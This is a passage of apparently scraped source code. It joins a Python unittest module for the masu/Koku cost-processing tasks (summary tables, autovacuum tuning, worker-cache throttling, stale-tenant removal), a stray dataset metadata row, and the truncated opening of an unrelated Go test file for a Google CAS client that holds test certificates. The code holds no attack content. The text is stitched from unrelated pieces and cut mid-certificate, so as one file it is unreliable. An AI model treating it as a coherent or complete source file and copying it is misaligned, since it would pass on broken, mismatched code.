cls.all_tables = list(AWS_CUR_TABLE_MAP.values()) + list(OCP_REPORT_TABLE_MAP.values())
cls.creator = ReportObjectCreator(cls.schema)
def setUp(self):
"""Set up each test."""
super().setUp()
self.aws_accessor = AWSReportDBAccessor(schema=self.schema)
self.ocp_accessor = OCPReportDBAccessor(schema=self.schema)
# Populate some line item data so that the summary tables
# have something to pull from
self.start_date = DateHelper().today.replace(day=1)
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
def test_update_summary_tables_aws(self, mock_charge_info, mock_views, mock_chain):
"""Test that the summary table task runs."""
provider = Provider.PROVIDER_AWS
provider_aws_uuid = self.aws_provider_uuid
daily_table_name = AWS_CUR_TABLE_MAP["line_item_daily"]
summary_table_name = AWS_CUR_TABLE_MAP["line_item_daily_summary"]
start_date = self.start_date.replace(day=1) + relativedelta.relativedelta(months=-1)
with schema_context(self.schema):
daily_query = self.aws_accessor._get_db_obj_query(daily_table_name)
summary_query = self.aws_accessor._get_db_obj_query(summary_table_name)
daily_query.delete()
summary_query.delete()
initial_daily_count = daily_query.count()
initial_summary_count = summary_query.count()
self.assertEqual(initial_daily_count, 0)
self.assertEqual(initial_summary_count, 0)
update_summary_tables(self.schema, provider, provider_aws_uuid, start_date, synchronous=True)
with schema_context(self.schema):
self.assertNotEqual(daily_query.count(), initial_daily_count)
self.assertNotEqual(summary_query.count(), initial_summary_count)
mock_chain.return_value.apply_async.assert_called()
@patch("masu.processor.tasks.chain")
def test_update_summary_tables_aws_end_date(self, mock_charge_info):
"""Test that the summary table task respects a date range."""
provider = Provider.PROVIDER_AWS_LOCAL
provider_aws_uuid = self.aws_provider_uuid
ce_table_name = AWS_CUR_TABLE_MAP["cost_entry"]
daily_table_name = AWS_CUR_TABLE_MAP["line_item_daily"]
summary_table_name = AWS_CUR_TABLE_MAP["line_item_daily_summary"]
start_date = DateHelper().last_month_start
end_date = DateHelper().last_month_end
daily_table = getattr(self.aws_accessor.report_schema, daily_table_name)
summary_table = getattr(self.aws_accessor.report_schema, summary_table_name)
ce_table = getattr(self.aws_accessor.report_schema, ce_table_name)
with schema_context(self.schema):
daily_table.objects.all().delete()
summary_table.objects.all().delete()
ce_start_date = ce_table.objects.filter(interval_start__gte=start_date.date()).aggregate(
Min("interval_start")
)["interval_start__min"]
ce_end_date = ce_table.objects.filter(interval_start__lte=end_date.date()).aggregate(
Max("interval_start")
)["interval_start__max"]
# The summary tables will only include dates where there is data
expected_start_date = max(start_date, ce_start_date)
expected_start_date = expected_start_date.replace(hour=0, minute=0, second=0, microsecond=0)
expected_end_date = min(end_date, ce_end_date)
expected_end_date = expected_end_date.replace(hour=0, minute=0, second=0, microsecond=0)
update_summary_tables(self.schema, provider, provider_aws_uuid, start_date, end_date, synchronous=True)
with schema_context(self.schema):
daily_entry = daily_table.objects.all().aggregate(Min("usage_start"), Max("usage_end"))
result_start_date = daily_entry["usage_start__min"]
result_end_date = daily_entry["usage_end__max"]
self.assertEqual(result_start_date, expected_start_date.date())
self.assertEqual(result_end_date, expected_end_date.date())
with schema_context(self.schema):
summary_entry = summary_table.objects.all().aggregate(Min("usage_start"), Max("usage_end"))
result_start_date = summary_entry["usage_start__min"]
result_end_date = summary_entry["usage_end__max"]
self.assertEqual(result_start_date, expected_start_date.date())
self.assertEqual(result_end_date, expected_end_date.date())
@patch("masu.processor.worker_cache.CELERY_INSPECT")
@patch("masu.processor.tasks.CostModelDBAccessor")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.ocp.ocp_cost_model_cost_updater.CostModelDBAccessor")
def test_update_summary_tables_ocp(
self, mock_cost_model, mock_charge_info, mock_view, mock_chain, mock_task_cost_model, mock_cache
):
"""Test that the summary table task runs."""
infrastructure_rates = {
"cpu_core_usage_per_hour": 1.5,
"memory_gb_usage_per_hour": 2.5,
"storage_gb_usage_per_month": 0.5,
}
markup = {}
mock_cost_model.return_value.__enter__.return_value.infrastructure_rates = infrastructure_rates
mock_cost_model.return_value.__enter__.return_value.supplementary_rates = {}
mock_cost_model.return_value.__enter__.return_value.markup = markup
# We need to bypass the None check for cost model in update_cost_model_costs
mock_task_cost_model.return_value.__enter__.return_value.cost_model = {}
provider = Provider.PROVIDER_OCP
provider_ocp_uuid = self.ocp_test_provider_uuid
daily_table_name = OCP_REPORT_TABLE_MAP["line_item_daily"]
start_date = DateHelper().last_month_start
end_date = DateHelper().last_month_end
with schema_context(self.schema):
daily_query = self.ocp_accessor._get_db_obj_query(daily_table_name)
daily_query.delete()
initial_daily_count = daily_query.count()
self.assertEqual(initial_daily_count, 0)
update_summary_tables(self.schema, provider, provider_ocp_uuid, start_date, end_date, synchronous=True)
with schema_context(self.schema):
self.assertNotEqual(daily_query.count(), initial_daily_count)
update_cost_model_costs(
schema_name=self.schema,
provider_uuid=provider_ocp_uuid,
start_date=start_date,
end_date=end_date,
synchronous=True,
)
table_name = OCP_REPORT_TABLE_MAP["line_item_daily_summary"]
with ProviderDBAccessor(provider_ocp_uuid) as provider_accessor:
provider_obj = provider_accessor.get_provider()
usage_period_qry = self.ocp_accessor.get_usage_period_query_by_provider(provider_obj.uuid)
with schema_context(self.schema):
cluster_id = usage_period_qry.first().cluster_id
items = self.ocp_accessor._get_db_obj_query(table_name).filter(
usage_start__gte=start_date,
usage_start__lte=end_date,
cluster_id=cluster_id,
data_source="Pod",
infrastructure_raw_cost__isnull=True,
)
for item in items:
self.assertNotEqual(item.infrastructure_usage_cost.get("cpu"), 0)
self.assertNotEqual(item.infrastructure_usage_cost.get("memory"), 0)
storage_daily_name = OCP_REPORT_TABLE_MAP["storage_line_item_daily"]
items = self.ocp_accessor._get_db_obj_query(storage_daily_name).filter(cluster_id=cluster_id)
for item in items:
self.assertIsNotNone(item.volume_request_storage_byte_seconds)
self.assertIsNotNone(item.persistentvolumeclaim_usage_byte_seconds)
storage_summary_name = OCP_REPORT_TABLE_MAP["line_item_daily_summary"]
items = self.ocp_accessor._get_db_obj_query(storage_summary_name).filter(
cluster_id=cluster_id, data_source="Storage", infrastructure_raw_cost__isnull=True
)
for item in items:
self.assertIsNotNone(item.volume_request_storage_gigabyte_months)
self.assertIsNotNone(item.persistentvolumeclaim_usage_gigabyte_months)
mock_chain.return_value.apply_async.assert_called()
@patch("masu.processor.tasks.chain")
@patch("masu.database.cost_model_db_accessor.CostModelDBAccessor.get_memory_gb_usage_per_hour_rates")
@patch("masu.database.cost_model_db_accessor.CostModelDBAccessor.get_cpu_core_usage_per_hour_rates")
def test_update_summary_tables_ocp_end_date(self, mock_cpu_rate, mock_mem_rate, mock_charge_info):
"""Test that the summary table task respects a date range."""
mock_cpu_rate.return_value = 1.5
mock_mem_rate.return_value = 2.5
provider = Provider.PROVIDER_OCP
provider_ocp_uuid = self.ocp_test_provider_uuid
ce_table_name = OCP_REPORT_TABLE_MAP["report"]
daily_table_name = OCP_REPORT_TABLE_MAP["line_item_daily"]
start_date = DateHelper().last_month_start
end_date = DateHelper().last_month_end
daily_table = getattr(self.ocp_accessor.report_schema, daily_table_name)
ce_table = getattr(self.ocp_accessor.report_schema, ce_table_name)
with schema_context(self.schema):
daily_table.objects.all().delete()
ce_start_date = ce_table.objects.filter(interval_start__gte=start_date.date()).aggregate(
Min("interval_start")
)["interval_start__min"]
ce_end_date = ce_table.objects.filter(interval_start__lte=end_date.date()).aggregate(
Max("interval_start")
)["interval_start__max"]
# The summary tables will only include dates where there is data
expected_start_date = max(start_date, ce_start_date)
expected_end_date = min(end_date, ce_end_date)
update_summary_tables(self.schema, provider, provider_ocp_uuid, start_date, end_date, synchronous=True)
with schema_context(self.schema):
daily_entry = daily_table.objects.all().aggregate(Min("usage_start"), Max("usage_end"))
result_start_date = daily_entry["usage_start__min"]
result_end_date = daily_entry["usage_end__max"]
self.assertEqual(result_start_date, expected_start_date.date())
self.assertEqual(result_end_date, expected_end_date.date())
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.CostModelDBAccessor")
def test_update_summary_tables_remove_expired_data(self, mock_accessor, mock_chain):
"""Test that the summary table task chains the cost model and materialized view updates."""
provider = Provider.PROVIDER_AWS
provider_aws_uuid = self.aws_provider_uuid
start_date = DateHelper().last_month_start - relativedelta.relativedelta(months=1)
end_date = DateHelper().today
expected_start_date = start_date.strftime("%Y-%m-%d")
expected_end_date = end_date.strftime("%Y-%m-%d")
manifest_id = 1
tracing_id = "1234"
update_summary_tables(
self.schema,
provider,
provider_aws_uuid,
start_date,
end_date,
manifest_id,
tracing_id=tracing_id,
synchronous=True,
)
mock_chain.assert_called_once_with(
update_cost_model_costs.s(
self.schema, provider_aws_uuid, expected_start_date, expected_end_date, tracing_id=tracing_id
).set(queue=UPDATE_COST_MODEL_COSTS_QUEUE)
| refresh_materialized_views.si(
self.schema, provider, provider_uuid=provider_aws_uuid, manifest_id=manifest_id, tracing_id=tracing_id
).set(queue=REFRESH_MATERIALIZED_VIEWS_QUEUE)
)
@patch("masu.processor.tasks.update_summary_tables")
def test_get_report_data_for_all_providers(self, mock_update):
"""Test GET report_data endpoint with provider_uuid=*."""
start_date = date.today()
update_all_summary_tables(start_date)
mock_update.s.assert_called_with(ANY, ANY, ANY, str(start_date), ANY, queue_name=ANY)
@patch("masu.processor.tasks.connection")
def test_vacuum_schema(self, mock_conn):
"""Test that the vacuum schema task runs."""
logging.disable(logging.NOTSET)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("table",)]
expected = "INFO:masu.processor.tasks:VACUUM ANALYZE acct10001.table"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
vacuum_schema(self.schema)
self.assertIn(expected, logger.output)
@patch("masu.processor.tasks.connection")
def test_autovacuum_tune_schema_default_table(self, mock_conn):
"""Test that the autovacuum tuning runs."""
logging.disable(logging.NOTSET)
# Make sure that the AUTOVACUUM_TUNING environment variable is unset!
if "AUTOVACUUM_TUNING" in os.environ:
del os.environ["AUTOVACUUM_TUNING"]
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 20000000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.01);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 2000000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.02);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 200000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.05);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 200000, {"autovacuum_vacuum_scale_factor": Decimal("0.05")})
]
expected = "INFO:masu.processor.tasks:Altered autovacuum_vacuum_scale_factor on 0 tables"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 20000, {"autovacuum_vacuum_scale_factor": Decimal("0.02")})
]
expected = "INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model reset (autovacuum_vacuum_scale_factor);"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
@patch("masu.processor.tasks.connection")
def test_autovacuum_tune_schema_custom_table(self, mock_conn):
"""Test that the autovacuum tuning runs."""
logging.disable(logging.NOTSET)
scale_table = [(10000000, "0.0001"), (1000000, "0.004"), (100000, "0.011")]
os.environ["AUTOVACUUM_TUNING"] = json.dumps(scale_table)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 20000000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.0001);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 2000000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.004);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [("cost_model", 200000, {})]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.011);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 200000, {"autovacuum_vacuum_scale_factor": Decimal("0.011")})
]
expected = "INFO:masu.processor.tasks:Altered autovacuum_vacuum_scale_factor on 0 tables"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 20000, {"autovacuum_vacuum_scale_factor": Decimal("0.004")})
]
expected = "INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model reset (autovacuum_vacuum_scale_factor);"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
del os.environ["AUTOVACUUM_TUNING"]
@patch("masu.processor.tasks.connection")
def test_autovacuum_tune_schema_manual_setting(self, mock_conn):
"""Test that the autovacuum tuning runs."""
logging.disable(logging.NOTSET)
# Make sure that the AUTOVACUUM_TUNING environment variable is unset!
if "AUTOVACUUM_TUNING" in os.environ:
del os.environ["AUTOVACUUM_TUNING"]
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 200000, {"autovacuum_vacuum_scale_factor": Decimal("0.04")})
]
expected = "INFO:masu.processor.tasks:Altered autovacuum_vacuum_scale_factor on 0 tables"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 200000, {"autovacuum_vacuum_scale_factor": Decimal("0.06")})
]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.05);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
@patch("masu.processor.tasks.connection")
def test_autovacuum_tune_schema_invalid_setting(self, mock_conn):
"""Test that the autovacuum tuning runs."""
logging.disable(logging.NOTSET)
# Make sure that the AUTOVACUUM_TUNING environment variable is unset!
if "AUTOVACUUM_TUNING" in os.environ:
del os.environ["AUTOVACUUM_TUNING"]
# This invalid setting should be treated as though there was no setting
mock_conn.cursor.return_value.__enter__.return_value.fetchall.return_value = [
("cost_model", 20000000, {"autovacuum_vacuum_scale_factor": ""})
]
expected = (
"INFO:masu.processor.tasks:ALTER TABLE acct10001.cost_model set (autovacuum_vacuum_scale_factor = 0.01);"
)
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
autovacuum_tune_schema(self.schema)
self.assertIn(expected, logger.output)
def test_autovacuum_tune_schema_normalize(self):
"""Test that the autovacuum tuning runs."""
test_matrix = [
{"table_options": None, "expected": {}},
{"table_options": "{}", "expected": {}},
{"table_options": {"foo": "bar"}, "expected": {"foo": "bar"}},
]
for test in test_matrix:
self.assertEquals(normalize_table_options(test.get("table_options")), test.get("expected"))
@patch("masu.processor.tasks.ReportStatsDBAccessor.get_last_completed_datetime")
def test_record_report_status(self, mock_accessor):
mock_accessor.return_value = True
manifest_id = 1
file_name = "testfile.csv"
request_id = 3
already_processed = record_report_status(manifest_id, file_name, request_id)
self.assertTrue(already_processed)
mock_accessor.return_value = False
already_processed = record_report_status(manifest_id, file_name, request_id)
self.assertFalse(already_processed)
def test_record_all_manifest_files(self):
"""Test that file list is saved in ReportStatsDBAccessor."""
files_list = ["file1.csv", "file2.csv", "file3.csv"]
manifest_id = 1
tracing_id = "1234"
record_all_manifest_files(manifest_id, files_list, tracing_id)
for report_file in files_list:
CostUsageReportStatus.objects.filter(report_name=report_file).exists()
def test_record_all_manifest_files_concurrent_writes(self):
"""Test that file list is saved in ReportStatsDBAccessor race condition."""
files_list = ["file1.csv", "file2.csv", "file3.csv"]
manifest_id = 1
tracing_id = "1234"
record_all_manifest_files(manifest_id, files_list, tracing_id)
with patch.object(ReportStatsDBAccessor, "does_db_entry_exist", return_value=False):
with patch.object(ReportStatsDBAccessor, "add", side_effect=IntegrityError):
record_all_manifest_files(manifest_id, files_list, tracing_id)
for report_file in files_list:
CostUsageReportStatus.objects.filter(report_name=report_file).exists()
class TestWorkerCacheThrottling(MasuTestCase):
"""Tests for tasks that use the worker cache."""
def single_task_is_running(self, task_name, task_args=None):
"""Check for a single task key in the cache."""
cache = caches["worker"]
cache_str = create_single_task_cache_key(task_name, task_args)
return True if cache.get(cache_str) else False
def lock_single_task(self, task_name, task_args=None, timeout=None):
"""Add a cache entry for a single task to lock a specific task."""
cache = caches["worker"]
cache_str = create_single_task_cache_key(task_name, task_args)
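        # The short 3-second TTL lets the throttling tests below wait out the lock with time.sleep(3).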
cache.add(cache_str, "true", 3)
@patch("masu.processor.tasks.update_summary_tables.s")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_summary_tables")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_daily_tables")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_summary_tables_worker_throttled(
self,
mock_inspect,
mock_lock,
mock_release,
mock_update_cost,
mock_refresh,
mock_chain,
mock_daily,
mock_summary,
mock_delay,
):
"""Test that the worker cache is used."""
task_name = "masu.processor.tasks.update_summary_tables"
cache_args = [self.schema, Provider.PROVIDER_AWS]
mock_lock.side_effect = self.lock_single_task
start_date = DateHelper().this_month_start
end_date = DateHelper().this_month_end
mock_daily.return_value = start_date, end_date
mock_summary.return_value = start_date, end_date
update_summary_tables(self.schema, Provider.PROVIDER_AWS, self.aws_provider_uuid, start_date, end_date)
mock_delay.assert_not_called()
update_summary_tables(self.schema, Provider.PROVIDER_AWS, self.aws_provider_uuid, start_date, end_date)
mock_delay.assert_called()
self.assertTrue(self.single_task_is_running(task_name, cache_args))
# Let the cache entry expire
time.sleep(3)
self.assertFalse(self.single_task_is_running(task_name, cache_args))
@patch("masu.processor.tasks.update_summary_tables.s")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_summary_tables")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_daily_tables")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_summary_tables_worker_error(
self,
mock_inspect,
mock_lock,
mock_release,
mock_update_cost,
mock_refresh,
mock_chain,
mock_daily,
mock_summary,
mock_delay,
):
"""Test that the worker cache is used."""
task_name = "masu.processor.tasks.update_summary_tables"
cache_args = [self.schema]
start_date = DateHelper().this_month_start
end_date = DateHelper().this_month_end
mock_daily.return_value = start_date, end_date
mock_summary.side_effect = ReportProcessorError
with self.assertRaises(ReportProcessorError):
update_summary_tables(self.schema, Provider.PROVIDER_AWS, self.aws_provider_uuid, start_date, end_date)
mock_delay.assert_not_called()
self.assertFalse(self.single_task_is_running(task_name, cache_args))
@patch("masu.processor.tasks.update_summary_tables.s")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_summary_tables")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_daily_tables")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_summary_tables_cloud_summary_error(
self,
mock_inspect,
mock_lock,
mock_release,
mock_update_cost,
mock_refresh,
mock_chain,
mock_daily,
mock_summary,
mock_delay,
):
"""Test that the update_summary_table cloud exception is caught."""
start_date = DateHelper().this_month_start
end_date = DateHelper().this_month_end
mock_daily.return_value = start_date, end_date
mock_summary.side_effect = ReportSummaryUpdaterCloudError
expected = "Failed to correlate"
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
update_summary_tables(self.schema, Provider.PROVIDER_AWS, self.aws_provider_uuid, start_date, end_date)
statement_found = False
for log in logger.output:
if expected in log:
statement_found = True
self.assertTrue(statement_found)
@patch("masu.processor.tasks.update_summary_tables.s")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_summary_tables")
@patch("masu.processor.tasks.ReportSummaryUpdater.update_daily_tables")
@patch("masu.processor.tasks.chain")
@patch("masu.processor.tasks.refresh_materialized_views")
@patch("masu.processor.tasks.update_cost_model_costs")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_summary_tables_provider_not_found_error(
self,
mock_inspect,
mock_lock,
mock_release,
mock_update_cost,
mock_refresh,
mock_chain,
mock_daily,
mock_summary,
mock_delay,
):
"""Test that the update_summary_table provider not found exception is caught."""
start_date = DateHelper().this_month_start
end_date = DateHelper().this_month_end
mock_daily.return_value = start_date, end_date
mock_summary.side_effect = ReportSummaryUpdaterProviderNotFoundError
expected = "Processing for this provier will halt."
with self.assertLogs("masu.processor.tasks", level="INFO") as logger:
update_summary_tables(self.schema, Provider.PROVIDER_AWS, uuid4(), start_date, end_date)
statement_found = False
for log in logger.output:
if expected in log:
statement_found = True
break
self.assertTrue(statement_found)
@skip("cost model calcs are taking longer with the conversion to partables. This test needs a rethink.")
@patch("masu.processor.tasks.update_cost_model_costs.s")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_cost_model_costs_throttled(self, mock_inspect, mock_lock, mock_release, mock_delay):
"""Test that refresh materialized views runs with cache lock."""
mock_lock.side_effect = self.lock_single_task
start_date = DateHelper().last_month_start - relativedelta.relativedelta(months=1)
end_date = DateHelper().today
expected_start_date = start_date.strftime("%Y-%m-%d")
expected_end_date = end_date.strftime("%Y-%m-%d")
task_name = "masu.processor.tasks.update_cost_model_costs"
cache_args = [self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date]
manifest_dict = {
"assembly_id": "12345",
"billing_period_start_datetime": DateHelper().today,
"num_total_files": 2,
"provider_uuid": self.aws_provider_uuid,
}
with ReportManifestDBAccessor() as manifest_accessor:
manifest = manifest_accessor.add(**manifest_dict)
manifest.save()
update_cost_model_costs(self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date)
mock_delay.assert_not_called()
update_cost_model_costs(self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date)
mock_delay.assert_called()
self.assertTrue(self.single_task_is_running(task_name, cache_args))
# Let the cache entry expire
time.sleep(3)
self.assertFalse(self.single_task_is_running(task_name, cache_args))
@patch("masu.processor.tasks.CostModelCostUpdater")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_update_cost_model_costs_error(self, mock_inspect, mock_lock, mock_release, mock_updater):
"""Test that refresh materialized views runs with cache lock."""
start_date = DateHelper().last_month_start - relativedelta.relativedelta(months=1)
end_date = DateHelper().today
expected_start_date = start_date.strftime("%Y-%m-%d")
expected_end_date = end_date.strftime("%Y-%m-%d")
task_name = "masu.processor.tasks.update_cost_model_costs"
cache_args = [self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date]
mock_updater.side_effect = ReportProcessorError
with self.assertRaises(ReportProcessorError):
update_cost_model_costs(self.schema, self.aws_provider_uuid, expected_start_date, expected_end_date)
self.assertFalse(self.single_task_is_running(task_name, cache_args))
@patch("masu.processor.tasks.refresh_materialized_views.s")
@patch("masu.processor.tasks.WorkerCache.release_single_task")
@patch("masu.processor.tasks.WorkerCache.lock_single_task")
@patch("masu.processor.worker_cache.CELERY_INSPECT")
def test_refresh_materialized_views_throttled(self, mock_inspect, mock_lock, mock_release, mock_delay):
"""Test that refresh materialized views runs with cache lock."""
mock_lock.side_effect = self.lock_single_task
task_name = "masu.processor.tasks.refresh_materialized_views"
cache_args = [self.schema, Provider.PROVIDER_AWS]
manifest_dict = {
"assembly_id": "12345",
"billing_period_start_datetime": DateHelper().today,
"num_total_files": 2,
"provider_uuid": self.aws_provider_uuid,
}
with ReportManifestDBAccessor() as manifest_accessor:
manifest = manifest_accessor.add(**manifest_dict)
manifest.save()
refresh_materialized_views(self.schema, Provider.PROVIDER_AWS, manifest_id=manifest.id)
mock_delay.assert_not_called()
refresh_materialized_views(self.schema, Provider.PROVIDER_AWS, manifest_id=manifest.id)
refresh_materialized_views(self.schema, Provider.PROVIDER_AWS, manifest_id=manifest.id)
mock_delay.assert_called()
self.assertTrue(self.single_task_is_running(task_name, cache_args))
# Let the cache entry expire
time.sleep(3)
self.assertFalse(self.single_task_is_running(task_name, cache_args))
class TestRemoveStaleTenants(MasuTestCase):
def setUp(self):
"""Set up middleware tests."""
super().setUp()
request = self.request_context["request"]
request.path = "/api/v1/tags/aws/"
def test_remove_stale_tenant(self):
"""Test removal of stale tenants that are older than two weeks"""
days = 14
initial_date_updated = self.customer.date_updated
self.assertIsNotNone(initial_date_updated)
with schema_context("public"):
mock_request = self.request_context["request"]
middleware = KokuTenantMiddleware()
middleware.get_tenant(Tenant, "localhost", mock_request)
self.assertNotEquals(KokuTenantMiddleware.tenant_cache.currsize, 0)
remove_stale_tenants() # Check that it is not clearing the cache unless removing
self.assertNotEquals(KokuTenantMiddleware.tenant_cache.currsize, 0)
self.customer.date_updated = DateHelper().n_days_ago(self.customer.date_updated, days)
self.customer.save()
before_len = Tenant.objects.count()
remove_stale_tenants()
after_len = Tenant.objects.count()
self.assertGreater(before_len, after_len)
self.assertEquals(KokuTenantMiddleware.tenant_cache.currsize, 0)
| [] | [] | ["AUTOVACUUM_TUNING"] | [] | ["AUTOVACUUM_TUNING"] | python | 1 | 0 |
cas/cloudcas/cloudcas_test.go | package cloudcas
import (
"bytes"
"context"
"crypto/rand"
"crypto/x509"
"encoding/asn1"
"io"
"os"
"reflect"
"testing"
"time"
"github.com/google/uuid"
gax "github.com/googleapis/gax-go/v2"
"github.com/pkg/errors"
"github.com/smallstep/certificates/cas/apiv1"
pb "google.golang.org/genproto/googleapis/cloud/security/privateca/v1beta1"
)
var (
errTest = errors.New("test error")
testAuthorityName = "projects/test-project/locations/us-west1/certificateAuthorities/test-ca"
testCertificateName = "projects/test-project/locations/us-west1/certificateAuthorities/test-ca/certificates/test-certificate"
testRootCertificate = `-----BEGIN CERTIFICATE-----
MIIBhjCCAS2gAwIBAgIQLbKTuXau4+t3KFbGpJJAADAKBggqhkjOPQQDAjAiMSAw
HgYDVQQDExdHb29nbGUgQ0FTIFRlc3QgUm9vdCBDQTAeFw0yMDA5MTQyMjQ4NDla
Fw0zMDA5MTIyMjQ4NDlaMCIxIDAeBgNVBAMTF0dvb2dsZSBDQVMgVGVzdCBSb290
IENBMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEYKGgQ3/0D7+oBTc0CXoYfSC6
M8hOqLsmzBapPZSYpfwjgEsjdNU84jdrYmW1zF1+p+MrL4c7qJv9NLo/picCuqNF
MEMwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVR0OBBYE
FFVn9V7Qymd7cUJh9KAhnUDAQL5YMAoGCCqGSM49BAMCA0cAMEQCIA4LzttYoT3u
8TYgSrvFT+Z+cklfi4UrPBU6aSbcUaW2AiAPfaqbyccQT3CxMVyHg+xZZjAirZp8
lAeA/T4FxAonHA==
-----END CERTIFICATE-----`
testIntermediateCertificate = `-----BEGIN CERTIFICATE-----
MIIBsDCCAVagAwIBAgIQOb91kHxWKVzSJ9ESW1ViVzAKBggqhkjOPQQDAjAiMSAw
HgYDVQQDExdHb29nbGUgQ0FTIFRlc3QgUm9vdCBDQTAeFw0yMDA5MTQyMjQ4NDla
Fw0zMDA5MTIyMjQ4NDlaMCoxKDAmBgNVBAMTH0dvb2dsZSBDQVMgVGVzdCBJbnRl
cm1lZGlhdGUgQ0EwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASUHN1cNyId4Ei/
